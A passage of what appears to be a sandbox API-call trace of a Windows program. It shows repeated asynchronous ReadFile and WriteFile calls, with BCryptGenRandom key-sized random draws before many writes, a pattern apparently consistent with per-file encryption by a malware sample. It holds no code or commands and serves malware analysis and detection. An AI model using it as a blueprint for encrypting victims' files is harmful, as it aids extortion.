lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.660] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbdae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0173.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.661] CloseHandle (hObject=0x308) returned 1 [0173.661] free (_Block=0x3df0008) [0173.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.693] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.693] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.701] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.701] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.701] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.701] free (_Block=0x3e305b8) [0173.701] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.701] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.701] free (_Block=0x1fa91d0) [0173.701] free (_Block=0x1fa2ed8) [0173.701] free (_Block=0x1fa90b8) [0173.701] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.703] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.725] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2a0a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0173.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.733] CloseHandle (hObject=0x2a4) returned 1 [0173.733] free (_Block=0x3d70450) [0173.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.740] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xf5c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.746] CloseHandle (hObject=0x170) returned 1 [0173.746] free (_Block=0x1ff1e60) [0173.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.753] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1dac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.764] CloseHandle (hObject=0xec) returned 1 [0173.764] free (_Block=0x3d70450) [0173.764] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.764] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0173.764] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.807] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0173.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.808] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.850] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x60c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.856] CloseHandle (hObject=0x338) returned 1 [0173.856] free (_Block=0x1ff1e60) [0173.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.862] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1b04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.862] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.871] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.871] free (_Block=0x3e305b8) [0173.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.871] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.872] free (_Block=0x1fa91d0) [0173.872] free (_Block=0x1fa2ed8) [0173.872] free (_Block=0x1fa90b8) [0173.872] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.879] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.879] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.879] free (_Block=0x3e305b8) [0173.879] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.879] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.879] free (_Block=0x1fa91d0) [0173.879] free (_Block=0x1fa2ed8) [0173.879] free (_Block=0x1fa90b8) [0173.879] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0173.880] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.883] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.892] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.893] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.893] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.893] free (_Block=0x3e305b8) [0173.893] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.893] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.893] free (_Block=0x1fa91d0) [0173.893] free (_Block=0x1fa2ed8) [0173.893] free (_Block=0x1fa90b8) [0173.893] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.902] CloseHandle (hObject=0x308) returned 1 [0173.903] free (_Block=0x3e70008) [0173.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.909] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x32f6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.926] CloseHandle (hObject=0x2a4) returned 1 [0173.926] free (_Block=0x3ef0008) [0173.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.934] CloseHandle (hObject=0x338) returned 1 [0173.934] free (_Block=0x1ff1e60) [0173.934] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.942] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2026, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.956] CloseHandle (hObject=0x170) returned 1 [0173.956] free (_Block=0x3d70450) [0173.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.957] CloseHandle (hObject=0x2a4) returned 1 [0173.957] free (_Block=0x3ef0008) [0173.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.957] CloseHandle (hObject=0x338) returned 1 [0173.957] free (_Block=0x1ff1e60) [0173.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.960] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xcdc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0173.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.960] CloseHandle (hObject=0xec) returned 1 [0173.960] free (_Block=0x3df0008) [0173.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0174.828] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.828] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0174.828] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0174.829] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0174.829] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0174.829] free (_Block=0x3e305b8) [0174.829] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0174.830] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0174.830] free (_Block=0x1fa91d0) [0174.830] free (_Block=0x1fa2ed8) [0174.830] free (_Block=0x1fa90b8) [0174.830] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0174.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0174.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0174.845] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0174.845] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0174.845] free (_Block=0x3e305b8) [0174.845] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0174.845] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0174.845] free (_Block=0x1fa91d0) [0174.845] free (_Block=0x1fa2ed8) [0174.845] free (_Block=0x1fa90b8) [0174.845] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0174.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0174.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0174.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0174.859] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0174.859] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0174.859] free (_Block=0x3e305b8) [0174.859] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0174.859] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0174.860] free (_Block=0x1fa91d0) [0174.860] free (_Block=0x1fa2ed8) [0174.860] free (_Block=0x1fa90b8) [0174.860] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0174.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0174.874] CloseHandle (hObject=0x338) returned 1 [0174.874] free (_Block=0x1ff1e60) [0174.874] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0174.888] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x2090, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0174.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0174.910] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x27c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.914] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0206.040] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0206.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0206.042] CloseHandle (hObject=0x338) returned 1 [0206.045] free (_Block=0x3f70048) [0206.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0206.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: 